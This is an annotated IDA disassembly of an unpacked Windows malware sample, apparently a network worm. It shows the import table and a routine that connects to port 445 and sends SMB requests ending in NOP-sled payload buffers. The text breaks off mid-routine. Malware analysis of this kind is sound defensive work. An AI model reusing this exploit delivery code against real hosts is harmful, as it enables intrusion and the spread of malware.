; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; Input MD5 : 6FD0ACABF4ED45CA283D35DDC50A54BF ; File Name : u:\work\6fd0acabf4ed45ca283d35ddc50a54bf_unpacked.exe ; Format : Portable executable for 80386 (PE) ; Imagebase : 31000000 ; Section 1. (virtual address 00001000) ; Virtual size : 00004000 ( 16384.) ; Section size in file : 00004000 ( 16384.) ; Offset to raw data for section: 00001000 ; Flags E0000080: Bss Executable Readable Writable ; Alignment : default unicode macro page,string,zero irpc c,<string> db '&c', page endm ifnb <zero> dw zero endif endm .686p .mmx .model flat ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX0 segment para public 'CODE' use32 assume cs:UPX0 ;org 31001000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_31001000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31001004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31001008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3100100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31002264+1Dr dword_31001010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31001014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31002264+4Er ... 
dword_31001018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3100101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31001020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31001024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31001028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3100102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31001030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31001034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31001038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h dword_31001040 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31001044 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_31001048 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_3100104C dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31001050 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_31001054 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31001058 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_310026A6+37r dword_3100105C dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_310026A6+3Dr dword_31001060 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31001064 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31001068 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3100106C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31001070 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31001074 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31001078 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31002542+8Fr dword_3100107C dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31001262+272r ... dword_31001080 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31001ADF+E2r ... 
dword_31001084 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_31001088 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_3100108C dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31001851+2Cr dword_31001090 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_31001E06+A4r dword_31001094 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_31001098 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_310019B3+19r ... dword_3100109C dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_31002310+92r dword_310010A0 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31001D8Ar dword_310010A4 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_310010A8 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_310010AC dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_310019B3+12r dword_310010B0 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_310010B4 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_310010B8 dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_310010BC dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_31001C18+66r ... 
; ---------------------------------------------------------------------------
; Import slots, continued.  This is not a real PE import directory: the UPX0
; section is RWX (flags E0000080) and every slot holds an absolute address
; that the unpacking stub wrote at run time; "resolved to->" is IDA's note of
; which export that address was on the machine the dump was taken on.  Use
; the names, not the numbers -- they are build-specific.
; ---------------------------------------------------------------------------
dword_310010C0  dd 7C80180Eh            ; resolved to->KERNEL32.ReadFile
dword_310010C4  dd 7C810A77h            ; resolved to->KERNEL32.GetFileSize
dword_310010C8  dd 7C801A24h            ; resolved to->KERNEL32.CreateFileA ; sub_310026A6+8Fr
dword_310010CC  dd 7C81CDDAh            ; resolved to->KERNEL32.ExitProcess ; sub_31002476+C3r
dword_310010D0  dd 7C910331h            ; resolved to->NTDLL.RtlGetLastWin32Error
dword_310010D4  dd 7C831EABh            ; resolved to->KERNEL32.DeleteFileA ; sub_31002476+Fr
dword_310010D8  dd 7C802520h            ; resolved to->KERNEL32.WaitForSingleObject
dword_310010DC  dd 7C8308ADh            ; resolved to->KERNEL32.CreateEventA
dword_310010E0  dd 7C809766h            ; resolved to->KERNEL32.InterlockedIncrement ; sub_3100202D+58r
                align 8
dword_310010E8  dd 77C46EB0h            ; resolved to->MSVCRT.memcmp
dword_310010EC  dd 77C47660h            ; resolved to->MSVCRT.strchr ; sub_31002928+68r
; ---------------------------------------------------------------------------
; NOTE(review): the three "instructions" below are almost certainly not code.
; The bytes 94 5C C3 77 (little-endian 77C35C94h) sit between the strchr and
; strstr slots and look like one more resolved MSVCRT pointer; IDA decoded
; them as code only because loc_31002BD0 -- the routine that sub_31001E06
; installs as its fs:0 exception handler -- references this address as data.
loc_310010F0:                           ; DATA XREF: UPX0:loc_31002BD0r
                xchg    eax, esp
                pop     esp
                retn
; ---------------------------------------------------------------------------
                db 77h
dword_310010F4  dd 77C47C60h            ; resolved to->MSVCRT.strstr ; sub_31002310+79r ...
dword_310010F8  dd 77C371D3h            ; resolved to->MSVCRT.rand ; sub_31001AC9+1r ...
dword_310010FC  dd 77C371BCh            ; resolved to->MSVCRT.srand
dword_31001100  dd 77C46F70h            ; resolved to->MSVCRT.memcpy
dword_31001104  dd 77C478A0h            ; resolved to->MSVCRT.strlen
dword_31001108  dd 77C475F0h            ; resolved to->MSVCRT.memset
                align 10h
dword_31001110  dd 7E42DE87h            ; resolved to->USER32.FindWindowA
dword_31001114  dd 7E41BE4Bh            ; resolved to->USER32.GetForegroundWindow
dword_31001118  dd 7E418A80h            ; resolved to->USER32.GetWindowThreadProcessId
dword_3100111C  dd 7E41A8ADh            ; resolved to->USER32.wsprintfA ; sub_31001ADF+8Br ...
                dd 0
; WinINet slots: only the downloader sub_31002A44 (outside this view) uses
; InternetOpenA/InternetOpenUrlA/InternetReadFile per the cross-references.
dword_31001124  dd 42C2ABF4h            ; resolved to->WININET.InternetReadFile ; sub_31002A44+B3r
dword_31001128  dd 42C30BFAh            ; resolved to->WININET.InternetOpenUrlA ; sub_31002A44+9Er
dword_3100112C  dd 42C2C8A1h            ; resolved to->WININET.InternetOpenA ; sub_31002A44+89r
dword_31001130  dd 42C1DAC1h            ; resolved to->WININET.InternetCloseHandle
dword_31001134  dd 42C367F6h            ; resolved to->WININET.InternetGetConnectedState ; UPX0:31002184r
                dd 0
; Winsock slots: server side (bind/listen/accept) is used by sub_31001C18,
; client side (connect/send/recv) by sub_31001262 and sub_31001ADF.
dword_3100113C  dd 71AB664Dh            ; resolved to->WS2_32.WSAStartup
dword_31001140  dd 71AB3E00h            ; resolved to->WS2_32.bind
dword_31001144  dd 71AB88D3h            ; resolved to->WS2_32.listen
dword_31001148  dd 71AC1028h            ; resolved to->WS2_32.accept
dword_3100114C  dd 71AB50C8h            ; resolved to->WS2_32.gethostname
dword_31001150  dd 71AB94DCh            ; resolved to->WS2_32.WSAGetLastError
dword_31001154  dd 71AB4FD4h            ; resolved to->WS2_32.gethostbyname
dword_31001158  dd 71AB3B91h            ; resolved to->WS2_32.socket ; sub_31001C18+ACr
dword_3100115C  dd 71AB3F41h            ; resolved to->WS2_32.inet_ntoa ; sub_310020F4+Dr
dword_31001160  dd 71AB2B66h            ; resolved to->WS2_32.ntohs ; sub_31001C18+F0r
dword_31001164  dd 71AB406Ah            ; resolved to->WS2_32.connect
dword_31001168  dd 71AB428Ah            ; resolved to->WS2_32.send ; sub_31001ADF+67r ...
dword_3100116C  dd 71AB615Ah            ; resolved to->WS2_32.recv ; sub_31001262+1D8r ...
dword_31001170  dd 71AC0BDEh            ; resolved to->WS2_32.shutdown ; sub_31001ADF+11Br
dword_31001174  dd 71AB9639h            ; resolved to->WS2_32.closesocket ; sub_31001ADF+122r
                align 10h
; SEH scope record {-1, 0, nullsub_1}: sub_31001E06 pushes its address
; together with the handler loc_31002BD0 before installing fs:0.
dword_31001180  dd 0FFFFFFFFh, 0
                dd offset nullsub_1
                align 10h

; =============== S U B R O U T I N E =======================================
;
; int __cdecl sub_31001190(DWORD *ctx, BYTE *keyBlob, DWORD keyBlobLen)
;   ctx[0] receives the CSP handle, ctx[1] the imported key handle.
;   CryptAcquireContextA(&ctx[0], NULL, NULL, 1 /*PROV_RSA_FULL*/, 0), and
;   if that fails the same call with dwFlags = 8 (CRYPT_NEWKEYSET); then
;   CryptImportKey(ctx[0], keyBlob, keyBlobLen, 0, 0, &ctx[1]).
;   Returns 0 on success, 1 if no context could be acquired, 2 if the key
;   import failed.  The blob comes from the caller (sub_31002928, not in
;   view) -- whether it is a public key is not visible here.
sub_31001190    proc near               ; CODE XREF: sub_31002928+BFp
arg_0           = dword ptr 4
arg_4           = dword ptr 8
arg_8           = dword ptr 0Ch
                push    ebx
                mov     ebx, [esp+4+arg_0]      ; ebx = ctx
                push    esi
                mov     esi, dword_31001034     ; esi = CryptAcquireContextA
                push    edi
                xor     edi, edi
                push    edi                     ; dwFlags = 0
                push    1                       ; dwProvType = PROV_RSA_FULL
                push    edi                     ; pszProvider = NULL
                push    edi                     ; pszContainer = NULL
                push    ebx                     ; phProv = &ctx[0]
                call    esi ; CryptAcquireContextA
                test    eax, eax
                jnz     short loc_310011BD
                push    8                       ; dwFlags = CRYPT_NEWKEYSET
                push    1
                push    edi
                push    edi
                push    ebx
                call    esi ; CryptAcquireContextA
                test    eax, eax
                jnz     short loc_310011BD
                push    1
                pop     eax                     ; return 1: no CSP context
                jmp     short loc_310011DB
; ---------------------------------------------------------------------------
loc_310011BD:                           ; CODE XREF: sub_31001190+19j
                                        ; sub_31001190+26j
                lea     eax, [ebx+4]
                push    eax                     ; phKey = &ctx[1]
                push    edi                     ; dwFlags = 0
                push    edi                     ; hPubKey = 0
                push    [esp+18h+arg_8]         ; dwDataLen
                push    [esp+1Ch+arg_4]         ; pbData
                push    dword ptr [ebx]         ; hProv
                call    dword_31001038 ; CryptImportKey
                neg     eax                     ; CF = (BOOL != 0)
                sbb     eax, eax                ; -1 if imported, 0 if not
                and     al, 0FEh
                inc     eax
                inc     eax                     ; -> 0 on success, 2 on failure
loc_310011DB:                           ; CODE XREF: sub_31001190+2Bj
                pop     edi
                pop     esi
                pop     ebx
                retn
sub_31001190    endp

; =============== S U B R O U T I N E =======================================
;
; int __cdecl sub_310011DF(DWORD *ctx) -- counterpart of sub_31001190:
; CryptDestroyKey(ctx[1]); CryptReleaseContext(ctx[0], 0).  Always returns 0.
sub_310011DF    proc near               ; CODE XREF: sub_31002928+10Fp
arg_0           = dword ptr 4
                push    esi
                mov     esi, [esp+4+arg_0]
                push    dword ptr [esi+4]
                call    dword_3100102C ; CryptDestroyKey
                push    0
                push    dword ptr [esi]
                call    dword_31001030 ; CryptReleaseContext
                xor     eax, eax
                pop     esi
                retn
sub_310011DF    endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;
; int __cdecl sub_310011FB(DWORD *ctx, BYTE *data, DWORD dataLen,
;                          BYTE *sig, DWORD sigLen, BOOL *verified)
;   MD5-hashes `data` (CALG_MD5 = 8003h) under ctx[0] and checks `sig`
;   against it with the key in ctx[1] via CryptVerifySignatureA.
;   *verified receives the raw BOOL from CryptVerifySignatureA.
;   Returns 0 if the verify call was reached (regardless of its outcome),
;   1 if CryptCreateHash failed, 2 if CryptHashData failed.
;   NOTE(review): a zero return does NOT mean the signature is valid -- the
;   caller must test *verified.  The hash handle is stored over the arg_0
;   stack slot, so `ctx` is not readable from arg_0 after CryptCreateHash.
sub_310011FB    proc near               ; CODE XREF: sub_31002928+EAp
arg_0           = dword ptr 8           ; in: ctx; after CryptCreateHash: hHash
arg_4           = dword ptr 0Ch
arg_8           = dword ptr 10h
arg_C           = dword ptr 14h
arg_10          = dword ptr 18h
arg_14          = dword ptr 1Ch
                push    ebp
                mov     ebp, esp
                push    esi
                mov     esi, [ebp+arg_0]        ; esi = ctx
                push    edi
                lea     eax, [ebp+arg_0]
                xor     edi, edi                ; edi = 0 and also the return value
                push    eax                     ; phHash = &arg_0
                push    edi                     ; dwFlags = 0
                push    edi                     ; hKey = 0
                push    8003h                   ; Algid = CALG_MD5
                push    dword ptr [esi]         ; hProv = ctx[0]
                call    dword_3100101C ; CryptCreateHash
                test    eax, eax
                jnz     short loc_31001221
                push    1
                pop     eax                     ; return 1: hash object not created
                jmp     short loc_3100125E
; ---------------------------------------------------------------------------
loc_31001221:                           ; CODE XREF: sub_310011FB+1Fj
                push    edi                     ; dwFlags = 0
                push    [ebp+arg_8]             ; dwDataLen
                push    [ebp+arg_4]             ; pbData
                push    [ebp+arg_0]             ; hHash
                call    dword_31001020 ; CryptHashData
                test    eax, eax
                jnz     short loc_3100123A
                push    2
                pop     edi                     ; return 2: hashing failed
                jmp     short loc_31001253
; ---------------------------------------------------------------------------
loc_3100123A:                           ; CODE XREF: sub_310011FB+38j
                push    edi                     ; dwFlags = 0
                push    edi                     ; sDescription = NULL
                push    dword ptr [esi+4]       ; hPubKey = ctx[1]
                push    [ebp+arg_10]            ; dwSigLen
                push    [ebp+arg_C]             ; pbSignature
                push    [ebp+arg_0]             ; hHash
                call    dword_31001024 ; CryptVerifySignatureA
                mov     ecx, [ebp+arg_14]
                mov     [ecx], eax              ; *verified = BOOL result
loc_31001253:                           ; CODE XREF: sub_310011FB+3Dj
                push    [ebp+arg_0]
                call    dword_31001028 ; CryptDestroyHash
                mov     eax, edi
loc_3100125E:                           ; CODE XREF: sub_310011FB+24j
                pop     edi
                pop     esi
                pop     ebp
                retn
sub_310011FB    endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;
; int __cdecl sub_31001262(in_addr target)
;   Connects to TCP port 1BDh (445) on `target` and plays a fixed exchange
;   of hand-built requests ending in a large buffer pre-filled with 90h
;   (x86 NOP) / 31h that embeds byte_31004000 and a short string taken from
;   dword_310049CC/D0.  Frame layout and the full walk-through follow.
;   Returns 0 if the final buffer was sent, 1 on any earlier failure.
sub_31001262    proc near               ; CODE XREF: sub_31001F41+36p
                                        ; sub_31001FA5+48p ...
; ---- sub_31001262 frame and body (the proc line is immediately above) ----
; What the calls below show: a TCP connection to port 1BDh (445, the SMB
; port) on the host in arg_0 (an in_addr); three fixed request blobs
; (dword_310042C8 / 31004354 / 31004400), then a 60h-byte template with
; the wsprintf'd host string inserted as UTF-16LE and two hand-patched
; length bytes, two more fixed blobs (dword_31004544 / 310045B0), and
; finally one large buffer whose bulk is 90h (x86 NOP) or 31h filler and
; which carries byte_31004000 plus the 8-byte string at var_14.  Byte 44h
; of the third reply selects one of two layouts for that last buffer.
; The blob contents are outside this view, so the protocol is not decoded
; here; the shape (fixed PDUs, NOP sled, length patching) is that of an
; exploit delivery, which is how the callers sub_31001F41/sub_31001FA5
; (scanner side, not in view) presumably use it -- TODO confirm.
; Observations: every recv() is compared with SOCKET_ERROR only, so a
; 0-byte reply (peer closed) is accepted as data; var_5/var_6 are byte
; length fields truncated to 8 bits, and var_5 is sign-extended before use.
var_89E4        = byte ptr -89E4h       ; branch-B buffer 1 (1C52h bytes, 31h-filled; 10FCh sent)
var_897C        = byte ptr -897Ch       ;   +68h: widened NOP sled (1B5Ah bytes)
var_690C        = byte ptr -690Ch       ; branch-B buffer 2 (1C52h bytes, 31h-filled; 0FDCh sent)
var_689C        = byte ptr -689Ch       ;   +70h: tail of the widened sled (0A5Eh bytes)
var_5DD8        = byte ptr -5DD8h       ;   +0B34h: dword_31004848 (84h bytes)
var_4834        = byte ptr -4834h       ; UTF-16LE widening of var_2CD8 (1B58h bytes)
var_4833        = byte ptr -4833h
var_37A0        = byte ptr -37A0h       ;   = var_4834 + 1094h
var_2CDC        = byte ptr -2CDCh       ; wide NUL right after var_4834
var_2CDB        = byte ptr -2CDBh
var_2CD8        = byte ptr -2CD8h       ; branch-B sled, 0DACh bytes of 90h
var_24F4        = byte ptr -24F4h       ;   +7E4h: dword_31004940
var_24E4        = byte ptr -24E4h       ;   +7F4h: byte_31004000
var_21C0        = byte ptr -21C0h       ;   +0B18h: loc_310049B8
var_21BC        = byte ptr -21BCh       ;   +0B1Ch: dword_31004940
var_21B0        = byte ptr -21B0h       ;   +0B28h: byte_31004000
var_1F28        = byte ptr -1F28h       ; branch-A buffer (0E29h bytes 31h-filled; 0CF8h sent)
var_1EAC        = byte ptr -1EACh       ;   +7Ch: var_F44 sled (7D0h bytes)
var_16DC        = byte ptr -16DCh       ;   +84Ch: dword_310046D4 (90h bytes)
var_1231        = byte ptr -1231h       ;   +0CF7h: last byte of the sent range, zeroed
var_F44         = byte ptr -0F44h       ; branch-A sled, 7D0h bytes of 90h
var_EA4         = byte ptr -0EA4h       ;   +0A0h: byte_31004000
var_798         = dword ptr -798h       ;   +7ACh: dword_31004906
var_788         = byte ptr -788h        ;   +7BCh: string at var_14
var_774         = byte ptr -774h        ; 640h-byte reply buffer
var_730         = byte ptr -730h        ;   reply byte 44h (branch selector)
var_134         = byte ptr -134h        ; var_4C widened to UTF-16LE (28h chars)
var_133         = byte ptr -133h
var_E4          = byte ptr -0E4h        ; 60h-byte request template (dword_310044E0)
var_E1          = byte ptr -0E1h        ;   +3: length byte = var_5
var_B7          = byte ptr -0B7h        ;   +2Dh: length byte = var_6
var_B5          = byte ptr -0B5h
var_B4          = byte ptr -0B4h        ;   +30h: UTF-16 host string
var_6C          = byte ptr -6Ch         ; dotted-quad of arg_0 (<= 1Ch chars)
var_4C          = byte ptr -4Ch         ; wsprintf(loc_310049C0, var_6C)
var_24          = word ptr -24h         ; sockaddr_in.sin_family
var_22          = word ptr -22h         ; sockaddr_in.sin_port
var_20          = dword ptr -20h        ; sockaddr_in.sin_addr
var_14          = dword ptr -14h        ; dword_310049CC ]  8 bytes treated as a
var_10          = dword ptr -10h        ; dword_310049D0 ]  C string (lstrlenA below)
var_C           = dword ptr -0Ch        ; return value: 1 until the final send
var_6           = byte ptr -6           ; strlen(var_4C)*2 + 9   (8-bit)
var_5           = byte ptr -5           ; (strlen(var_4C)+1Ah)*2 (8-bit)
var_4           = dword ptr -4          ; SOCKET
arg_0           = dword ptr 8           ; in: in_addr; later reused as branch flag (0 = A, 1 = B)
                push    ebp
                mov     ebp, esp
                mov     eax, 89E4h
                call    sub_31002BA0            ; stack probe for the 89E4h-byte frame (size in eax) -- presumably __chkstk
                mov     eax, dword_310049CC
                push    ebx
                push    edi
                push    1
                pop     edi                     ; edi = 1
                xor     ebx, ebx                ; ebx = 0
                mov     [ebp+var_14], eax
                mov     eax, dword_310049D0
                push    ebx                     ; protocol = 0
                push    edi                     ; type = SOCK_STREAM
                push    2                       ; af = AF_INET
                mov     [ebp+var_10], eax
                mov     [ebp+var_C], edi        ; result = 1 (failure) by default
                call    dword_31001158 ; socket
                cmp     eax, 0FFFFFFFFh
                mov     [ebp+var_4], eax
                jz      loc_310017C2
                push    esi
                mov     esi, [ebp+arg_0]        ; esi = target in_addr
                push    1Dh
                push    esi
                call    dword_3100115C ; inet_ntoa
                push    eax
                lea     eax, [ebp+var_6C]
                push    eax
                call    dword_31001084 ; lstrcpynA  (var_6C = dotted quad, <= 1Dh bytes)
                lea     eax, [ebp+var_6C]
                push    eax
                lea     eax, [ebp+var_4C]
                push    offset loc_310049C0     ; format string, outside this view
                push    eax
                call    dword_3100111C ; wsprintfA  (var_4C = fmt % ip)
                add     esp, 0Ch
                xor     ecx, ecx
                lea     eax, [ebp+var_133]
loc_310012D5:                           ; CODE XREF: sub_31001262+83j
                                        ; widen var_4C -> var_134 as UTF-16LE:
                                        ; 28h chars, each followed by a 0 byte
                mov     dl, [ebp+ecx+var_4C]
                mov     [eax-1], dl
                and     byte ptr [eax], 0
                inc     ecx
                inc     eax
                inc     eax
                cmp     ecx, 28h
                jl      short loc_310012D5
                push    60h
                lea     eax, [ebp+var_E4]
                push    offset dword_310044E0   ; 60h-byte request template
                push    eax
                call    sub_31002B98 ; memcpy    (var_E4 = template)
                lea     eax, [ebp+var_4C]
                push    eax
                call    sub_31002B92 ; strlen
                shl     eax, 1                  ; byte length of the UTF-16 string
                push    eax
                lea     eax, [ebp+var_134]
                push    eax
                lea     eax, [ebp+var_B4]       ; template + 30h
                push    eax
                call    sub_31002B98 ; memcpy
                add     esp, 1Ch
                lea     eax, [ebp+var_4C]
                push    9                       ; memcpy len, left on the stack across strlen
                push    (offset aC+3)           ; memcpy src: 3 bytes into string aC
                push    eax
                call    sub_31002B92 ; strlen
                pop     ecx
                lea     eax, [ebp+eax*2+var_B5] ; dst = directly after the UTF-16 string
                push    eax
                call    sub_31002B98 ; memcpy
                lea     eax, [ebp+var_4C]
                push    eax
                call    sub_31002B92 ; strlen
                add     al, 1Ah
                push    edi                     ; memcpy len = 1
                shl     al, 1
                mov     [ebp+var_5], al         ; var_5 = (strlen+1Ah)*2, low 8 bits only
                lea     eax, [ebp+var_5]
                push    eax
                lea     eax, [ebp+var_E1]       ; template + 3
                push    eax
                call    sub_31002B98 ; memcpy
                lea     eax, [ebp+var_4C]
                push    eax
                call    sub_31002B92 ; strlen
                shl     al, 1
                add     al, 9
                push    edi                     ; memcpy len = 1
                mov     [ebp+var_6], al         ; var_6 = strlen*2+9, low 8 bits only
                lea     eax, [ebp+var_6]
                push    eax
                lea     eax, [ebp+var_B7]       ; template + 2Dh
                push    eax
                call    sub_31002B98 ; memcpy
                push    0E29h
                lea     eax, [ebp+var_1F28]
                push    31h
                push    eax
                call    sub_31002B8C ; memset    (branch-A buffer = '1' * 0E29h)
                push    10h
                lea     eax, [ebp+var_24]
                push    ebx
                push    eax
                call    sub_31002B8C ; memset    (sockaddr_in = {0})
                add     esp, 44h
                mov     [ebp+var_24], 2         ; sin_family = AF_INET
                push    1BDh                    ; port 445
                call    dword_31001160 ; ntohs
                mov     [ebp+var_22], ax        ; sin_port
                lea     eax, [ebp+var_24]
                push    10h
                push    eax
                push    [ebp+var_4]
                mov     [ebp+var_20], esi       ; sin_addr = arg_0
                call    dword_31001164 ; connect
                cmp     eax, 0FFFFFFFFh
                jz      loc_310017B8
                mov     esi, dword_31001080     ; esi = Sleep
                mov     edi, 0C8h               ; edi = 200 (ms), reused for every Sleep below
                push    edi
                call    esi ; Sleep
                push    ebx                     ; send flags = 0
                mov     ebx, dword_31001168     ; ebx = send
                push    89h
                push    offset dword_310042C8   ; request 1 (89h bytes, outside this view)
                push    [ebp+var_4]
                call    ebx ; send
                push    edi
                call    esi ; Sleep
                push    0
                lea     eax, [ebp+var_774]
                push    640h
                push    eax
                push    [ebp+var_4]
                call    dword_3100116C ; recv
                cmp     eax, 0FFFFFFFFh         ; only SOCKET_ERROR is rejected
                jz      loc_310017AD
                push    0
                push    0A8h
                push    offset dword_31004354   ; request 2 (0A8h bytes)
                push    [ebp+var_4]
                call    ebx ; send
                push    edi
                call    esi ; Sleep
                push    0
                lea     eax, [ebp+var_774]
                push    640h
                push    eax
                push    [ebp+var_4]
                call    dword_3100116C ; recv
                cmp     eax, 0FFFFFFFFh
                jz      loc_310017AD
                push    0
                push    0DEh
                push    offset dword_31004400   ; request 3 (0DEh bytes)
                push    [ebp+var_4]
                call    ebx ; send
                push    edi
                call    esi ; Sleep
                push    0
                lea     eax, [ebp+var_774]
                push    640h
                push    eax
                push    [ebp+var_4]
                call    dword_3100116C ; recv
                cmp     eax, 0FFFFFFFFh
                jz      loc_310017AD
                cmp     eax, 46h                ; reply 3 must be >= 46h bytes
                jl      loc_310017AD
                cmp     [ebp+var_730], 31h      ; reply byte 44h == '1' ?
                jnz     loc_31001658            ; no  -> branch B
                                        ; ---- branch A: 7D0h-byte NOP sled with payload pieces
                and     [ebp+arg_0], 0          ; flag = 0 (branch A)
                push    7D0h
                lea     eax, [ebp+var_F44]
                push    90h
                push    eax
                call    sub_31002B8C ; memset    (var_F44 = NOP * 7D0h)
                add     esp, 0Ch
                push    offset byte_31004000
                call    dword_3100107C ; lstrlenA
                push    eax
                lea     eax, [ebp+var_EA4]      ; sled + 0A0h
                push    offset byte_31004000    ; embedded blob/string, outside this view
                push    eax
                call    sub_31002B98 ; memcpy
                add     esp, 0Ch
                lea     eax, [ebp+var_14]
                push    eax
                call    dword_3100107C ; lstrlenA  (var_14/var_10 read as a C string)
                push    eax
                lea     eax, [ebp+var_14]
                push    eax
                lea     eax, [ebp+var_788]      ; sled + 7BCh
                push    eax
                call    sub_31002B98 ; memcpy
                mov     eax, dword_31004906
                add     esp, 0Ch
                mov     [ebp+var_798], eax      ; sled + 7ACh = dword_31004906
loc_310014F9:                           ; CODE XREF: sub_31001262+4E1j
                                        ; ---- common: both branches continue here
                movsx   eax, [ebp+var_5]        ; NOTE(review): sign-extended; var_5 >= 80h
                add     eax, 4                  ;   gives a negative send() length
                push    0
                push    eax
                lea     eax, [ebp+var_E4]
                push    eax
                push    [ebp+var_4]
                call    ebx ; send                (request 4: template + host string)
                push    edi
                call    esi ; Sleep
                push    0
                lea     eax, [ebp+var_774]
                push    640h
                push    eax
                push    [ebp+var_4]
                call    dword_3100116C ; recv
                cmp     eax, 0FFFFFFFFh
                jz      loc_310017AD
                push    0
                push    68h
                push    offset dword_31004544   ; request 5 (68h bytes)
                push    [ebp+var_4]
                call    ebx ; send
                push    edi
                call    esi ; Sleep
                push    0
                lea     eax, [ebp+var_774]
                push    640h
                push    eax
                push    [ebp+var_4]
                call    dword_3100116C ; recv
                cmp     eax, 0FFFFFFFFh
                jz      loc_310017AD
                push    0
                push    0A0h
                push    offset dword_310045B0   ; request 6 (0A0h bytes)
                push    [ebp+var_4]
                call    ebx ; send
                push    edi
                call    esi ; Sleep
                push    0
                lea     eax, [ebp+var_774]
                push    640h
                push    eax
                push    [ebp+var_4]
                call    dword_3100116C ; recv
                cmp     eax, 0FFFFFFFFh
                jz      loc_310017AD
                cmp     [ebp+arg_0], 0
                jz      loc_31001748            ; branch A -> build var_1F28
                                        ; ---- branch B final build: two buffers
                push    68h
                lea     eax, [ebp+var_89E4]
                push    offset dword_31004768   ; header 1 (68h bytes)
                push    eax
                call    sub_31002B98 ; memcpy
                lea     eax, [ebp+var_4834]
                push    1B5Ah                   ; widened sled + wide NUL
                push    eax
                lea     eax, [ebp+var_897C]     ; buffer 1 + 68h
                push    eax
                call    sub_31002B98 ; memcpy
                push    70h
                lea     eax, [ebp+var_690C]
                push    offset dword_310047D4   ; header 2 (70h bytes)
                push    eax
                call    sub_31002B98 ; memcpy
                lea     eax, [ebp+var_37A0]     ; widened sled + 1094h
                push    0A5Eh
                push    eax
                lea     eax, [ebp+var_689C]     ; buffer 2 + 70h
                push    eax
                call    sub_31002B98 ; memcpy
                push    84h
                lea     eax, [ebp+var_5DD8]     ; buffer 2 + 0B34h
                push    offset dword_31004848   ; trailer (84h bytes)
                push    eax
                call    sub_31002B98 ; memcpy
                add     esp, 3Ch
                lea     eax, [ebp+var_89E4]
                push    0
                push    10FCh
                push    eax
                push    [ebp+var_4]
                call    ebx ; send                (buffer 1, 10FCh bytes)
                push    edi
                call    esi ; Sleep
                push    0
                lea     eax, [ebp+var_774]
                push    640h
                push    eax
                push    [ebp+var_4]
                call    dword_3100116C ; recv
                cmp     eax, 0FFFFFFFFh
                jz      loc_310017AD
                push    0
                push    0FDCh
                lea     eax, [ebp+var_690C]     ; buffer 2, 0FDCh bytes
                jmp     loc_310017A0
; ---------------------------------------------------------------------------
loc_31001658:                           ; CODE XREF: sub_31001262+22Bj
                                        ; ---- branch B prep: 0DACh-byte NOP sled, then widened to UTF-16LE
                push    0DACh
                lea     eax, [ebp+var_2CD8]
                push    90h
                push    eax
                mov     [ebp+arg_0], 1          ; flag = 1 (branch B)
